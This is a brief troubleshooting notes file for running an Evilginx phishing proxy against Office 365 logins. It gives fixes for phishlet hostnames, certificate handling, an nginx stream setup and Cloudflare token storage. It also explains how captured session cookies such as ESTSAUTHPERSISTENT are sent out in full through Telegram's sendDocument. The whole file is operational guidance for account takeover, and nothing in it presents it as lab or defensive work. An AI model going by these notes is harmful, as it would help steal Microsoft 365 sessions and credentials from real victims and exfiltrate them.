Dead Ends
Things that failed, why, and what to do instead. Do not retry these.
Evilginx
phishlets hostname o365 login.domain.com
Creates login.login.domain.com (double prefix). Use base domain only — evilginx adds login. automatically.
config ipv4 x.x.x.x
Invalid syntax. Use: config ip x.x.x.x
Place cert while evilginx running, then disable+enable phishlet
Cert not picked up. Kill and restart evilginx fully.
Let evilginx request its own ACME cert
Hangs if no CF credentials patched in. Use certbot externally, copy files to /root/.evilginx/crt/domain/
Nginx
stream block without load_module directive
nginx: unknown directive "stream". Add load_module /usr/lib/nginx/modules/ngx_stream_module.so; at top. Also: apt install libnginx-mod-stream
Cloudflare / Certbot
CF token stored as CF_Token=xxx, read with grep
grep returns empty, ini file blank. Store raw token. Read with: TOKEN=$(cat /root/.cf_creds | tr -d "[:space:]")
Telegram
Sending full session cookies as Telegram text message
ESTSAUTHPERSISTENT is 800+ chars. Telegram text cap is 4096. Gets truncated or split. Use sendDocument — no size limit.
SSH
Private key with wrong permissions (644 or 755)
SSH refuses: "bad permissions". Always: chmod 600 ~/.ssh/keyfile immediately after saving.